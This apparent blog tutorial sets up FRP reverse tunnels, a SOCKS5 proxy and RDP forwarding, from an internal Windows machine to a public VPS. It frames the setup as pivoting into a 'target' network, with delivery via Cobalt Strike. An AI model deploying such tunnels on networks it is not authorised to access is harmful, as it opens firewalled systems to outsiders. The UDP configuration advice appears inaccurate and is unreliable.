Establishing TCP/UDP Tunnels with FRP for Internal Network Access

Overview

FRP (Fast Reverse Proxy) is a lightweight, open-source reverse proxy tool designed to expose local services behind NATs or firewalls to the public internet. It supports multiple protocols including TCP, UDP, and HTTP, enabling flexible tunneling scenarios such as remote administration, service forwarding, and internal network reconnaissance.

Environment Setup

  • Public-facing server: A Linux VPS (e.g., Ubuntu or Kali) with a static IPv4 address.
  • Internal client: A Windows machine residing in a private network (e.g., 192.168.0.132).
  • Basic familiarity with command-line interfaces on both systems is assumed.

Server Configuration

After SSH access to the VPS, determine the system architecture:

uname -m

For x86_64, download the corresponding release:

wget https://github.com/fatedier/frp/releases/download/v0.57.0/frp_0.57.0_linux_amd64.tar.gz
tar -xzf frp_0.57.0_linux_amd64.tar.gz
mv frp_0.57.0_linux_amd64 frp-server
cd frp-server

Retain only the server binaries:

rm frpc frpc.ini

Edit frps.ini:

[common]
bind_addr = 0.0.0.0
bind_port = 7000
dashboard_addr = 0.0.0.0
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = securepass
token = shared_secret_2024
heartbeat_timeout = 90
max_pool_count = 10

Launch the server:

./frps -c frps.ini

Verify operation by visiting http://<vps-ip>:7500 and logging in with the configured credentials.

Client Deployment

Transfer frpc.exe and frpc.ini to the target Windows host (e.g., via Cobalt Strike, PowerShell, or manual upload).

Configure frpc.ini:

[common]
server_addr = 103.234.72.5
server_port = 7000
token = shared_secret_2024
pool_count = 5
protocol = tcp
health_check_type = tcp
health_check_interval_s = 60

[socks-proxy]
type = tcp
remote_port = 10000
plugin = socks5
use_encryption = true
use_compression = true

Start the client from PowerShell or CMD:

.\frpc.exe -c frpc.ini

Up on successful connection, the FRP dashboard will display an active client session.

Local Proxy Usage

Configure a SOCKS5 proxy in your browser or system settings:

  • Host: 103.234.72.5
  • Port: 10000

With the proxy enabled, requests to http://192.168.0.132/ (or any internal resource) are routed through the tunnel — effectively extending your local network reach.

Protocol Flexibility

To forward raw TCP traffic (e.g., RDP or SSH), replace the [socks-proxy] section with:

[rdp-forward]
type = tcp
remote_port = 3389
local_ip = 127.0.0.1
local_port = 3389

Then connect to <vps-ip>:3389 to access the internal RDP service.

For UDP-based forwarding (e.g., DNS or VoIP), adjust type and specify local_port/remote_port accordingly, ensuring protocol = udp is set in [common].

Tags: frp reverse-proxy tcp-tunneling udp-tunneling network-penetration

Posted on Sun, 17 May 2026 06:45:10 +0000 by TheCase

Hot Tags

©2026 Freaks City